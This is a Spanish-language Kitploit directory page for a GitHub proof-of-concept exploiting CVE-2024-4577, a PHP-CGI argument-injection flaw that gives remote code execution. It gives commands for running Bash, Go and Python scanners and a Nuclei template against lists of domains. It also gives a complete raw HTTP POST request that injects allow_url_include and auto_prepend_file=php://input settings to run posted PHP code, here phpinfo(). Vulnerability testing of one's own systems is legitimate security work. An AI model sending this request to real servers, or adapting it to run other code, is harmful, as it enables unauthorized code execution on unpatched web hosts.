Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-4577-PHP-RCE — PHP RCE PoC para CVE-2024-4577 escrito en bash, go, python y una plantilla de nuclei | Kitploit
Herramientas/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PHP RCE PoC para CVE-2024-4577 escrito en bash, go, python y una plantilla de nuclei

Ver Repositorio
33136hace 2 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PHP RCE PoC

CVE-2024-4577: Inyección de Argumentos en PHP-CGI

Resumen

Este repositorio contiene scripts para verificar la vulnerabilidad CVE-2024-4577, un problema de inyección de argumentos en PHP-CGI. Puede usar los scripts Bash, Go y Python proporcionados para probar una lista de dominios para esta vulnerabilidad. También he publicado un archivo YAML de Nuclei.

Uso

Script Bash

Para usar el script Bash, ejecute el siguiente comando:

./CVE-2024-4577.sh /path/to/domains-list

Script Go

Primero, guarde el script Go en un archivo llamado CVE-2024-4577.go. Para compilar y ejecutar el script Go:

  1. Compile el script Go en un binario:

    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  2. Ejecute el binario con el archivo de lista de dominios como argumento:

    ./CVE-2024-4577 /path/to/domains-list
    

Script Python

Primero, guarde el script Python en un archivo llamado CVE-2024-4577.py. Para ejecutar el script Python:

  1. Asegúrese de tener instalada la biblioteca requests:

    pip install requests
    
  2. Ejecute el script Python con el archivo de lista de dominios como argumento:

    python CVE-2024-4577.py /path/to/domains-list
    
  3. (Opcional) Si desea imprimir solo los hosts vulnerables:

    python CVE-2024-4577.py /path/to/domains-list --quiet
    

Explicación de la Prueba de Concepto (PoC)

Para probar manualmente la vulnerabilidad, puede enviar la siguiente solicitud POST:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

Plantilla de Nuclei

También he creado una plantilla de Nuclei para escanear instancias vulnerables, utiliza el esquema de diseño v3 y ha sido probada en un entorno de laboratorio:

nuclei -t CVE-2024-4577.yaml -u <target-url>

Ejemplo de Lista de Dominios

La lista de dominios debe tener el prefijo http/https para asegurar que se lean correctamente.

http://example.com
http://testsite.com
http://vulnerablesite.com

Ejemplo de Salida

Si se encuentra que un dominio es vulnerable, la salida será:

http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
Descargar herramienta